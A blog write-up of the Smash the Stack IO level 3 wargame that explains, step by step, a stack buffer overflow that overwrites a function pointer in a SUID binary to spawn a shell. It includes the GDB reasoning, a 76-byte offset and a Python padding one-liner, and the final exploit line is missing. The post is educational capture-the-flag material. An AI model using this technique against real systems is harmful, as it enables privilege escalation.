Tuesday, October 23, 2012

Smash the Stack IO Level 3 Writeup

Introduction

For the third level of Smash the Stack (IO), we are given both the source code and a binary to work with. As always, we will use the password obtained in the previous writeup to login to the server as 'level3'. Let's take a look and see if we can find a way to extract the password for level 4.

Analyzing Level 3

As noted, we are given both the source code (level03.c), and a corresponding binary (level03). Let's start analysis by dissecting the source code:

Immediately, we can see that we want to find some way to execute the 'good' function, as it spawns a shell which would give us level4 permissions since this is a SUID binary. It appears as though the 'bad' function, when executed, will give us a memory location we 'are at', as well as the memory location of the good function - where we want to be.

Moving on to the main function, we can see that we start by allocated a function pointer which points to the address of the 'bad' function. We can reason that we want to find some way to make the function pointer point to the 'good' function instead of the 'bad' function. We then create a 50 byte character array called 'buffer'.

After these two local variables have been created, we see our typical check for the appropriate number of arguments (in this case checking to see if we have provided one argument), and then we note that the program ensures that the length of our argument is >= 4. Otherwise, the program returns 0 and exits.

Assuming we pass the 'usage check' by providing one argument with length >= 4, the program then calls the memcpy function. By reading documentation on the function, we see that this function will copy length(our_argument) bytes from our argument into the buffer. After this, the program then calls the memset function. This function will set the first length(our_argument) - 4 bytes of buffer to 0. The function then prints out the address our functionpointer is pointing to, and calls the function at that address. We can see that somewhere before this call, we need to find a way to change the address functionpointer points to.

To investigate, let's take a look at what we think our stack should look like before the memcpy function is called. Remember, the stack grows from high memory addresses to lower addresses.

The key thing to know about memcpy (and many other similar functions such as strcpy()) is that it writes from low to high addresses. With this being the case, the data written to buffer is written towards our function pointer. Another key thing to know about write functions is that many don't have protections to ensure that the data being written can actually fit in the buffer it's being written to. This lack of error checking provides an increase in speed and simplicity to the language, but it can be dangerous.

Let's go back to our code to see why.

memcpy(buffer, argv[1], strlen(argv[1]));

We can see that the number of bytes we copy into the buffer depends only on the size of our input. The program does not check to make sure that our input is less than the storage space of the buffer. Instead, if we provide more data than can be stored in the buffer, memcpy simply keeps overwriting crucial memory until our argument has been stored. With this being the case, we can control what data is written into 'functionpointer'. This is an example of a stack based buffer overflow. Let's take a closer look with our debugger to see how we can exploit this vulnerability:

We aren't going to pick this entire disassembled program apart, as it would take an entire blog post by itself (though there might be one in the future if it is requested). However, what we want to do is see how are our stack is structured, as well as verify our theory that memory will be written from low to high addresses. Let's put a breakpoint right after the memcpy function is executed, run the program with the argument 'AAAAA', and see what we find.

Let's examine what's going on in the snippet above. We first set our breakpoint to the address containing the instruction after the memcpy function. Then, we run the program using 'AAAAA' as the provided argument, and once the breakpoint is reached, we tell GDB that we want to examine 32 hex-words starting at ESP and going towards higher memory addresses. This allows us to see the stack. From here, we can note our argument has been copied to the local 'buffer' variable, starting at the address 0xbfffdc80. The value \x41 is ASCII for 'A', and is commonly used as a standard for checking for buffer-overflows because it was one of the first characters used by pioneers of the technique, and it's easily recognizable (as well as a couple other reasons that are beyond the scope of this post).

We can tell, however, that the values are being copied from lower addresses to higher addresses. We then need to find out how many bytes it would take to overwrite our function pointer (as it's not always going to be exactly the length of the buffer + length of the function pointer since the compiler may add some padding). To do this, we first need to find the address of our function pointer. Then, we can subtract our buffer starting address from this to obtain the number of bytes between the two that we need to overwrite before we can change the contents of the function pointer.

We can find the address of the function pointer in two ways:

Use our GDB disassembly

Run the program (as it will tell us the address of our function pointer)

We can see at the beginning of our program that we load the address of a function into one of our local variables. Then, at the end our program, we load this address into eax and call the function located at that address. We can use this information to deduce that our function pointer contains the address 0x80484a4.

Analysis by Running the Program:
If we run the program without overwriting the contents of the function pointer, we will see its contents.

level3@io:~$ /levels/level03 AAAAA
This is exciting we're going to 0x80484a4
I'm so sorry, you're at 0x80484a4 and you want to be at 0x8048474

As was the case with our GDB analysis, our function pointer appears to contain the address 0x80484a4. We can then use this knowledge to find the address at which our function pointer resides. Referring back to our stack output, we can see that the start of our function pointer occurs at the address 0xbfffdccc. If we subtract the starting address of our buffer, we see that there are 76 bytes that we need to fill with garbage before we can access the contents of the function pointer. Let's verify that real quick. As a side note, typing out 76 'A's can be exhausting, so let's let scripting do the work for us. We can print 76 'A's using Python with the following command:

python -c 'print "A"*76'

Then, if we wrap the command inside $(command), our program will use the output of the command as its first argument. This can be invaluable in crafting exploits.

Perfect. As we suspected, we have successfully overwritten data to the start of the function pointer. Now we just need to overwrite the address of the function pointer to the correct address (that of the 'good' function). However, one thing to remember is that x86 processors store data in little-endian byte order. Therefore, we need to remember to reverse the order of the bytes so that they are stored correctly.

Crafting the Final Exploit

As done previously, we will use Python to fill the first 76 bytes, and then we will overwrite the function pointer with the correct address. Our final exploit will look like this:

Awesome. Just as we expected, we overwrote the function pointer and called the 'good' function, resulting in our shell. I hope this helped, and as always, if you ever have any questions or comments, leave them below!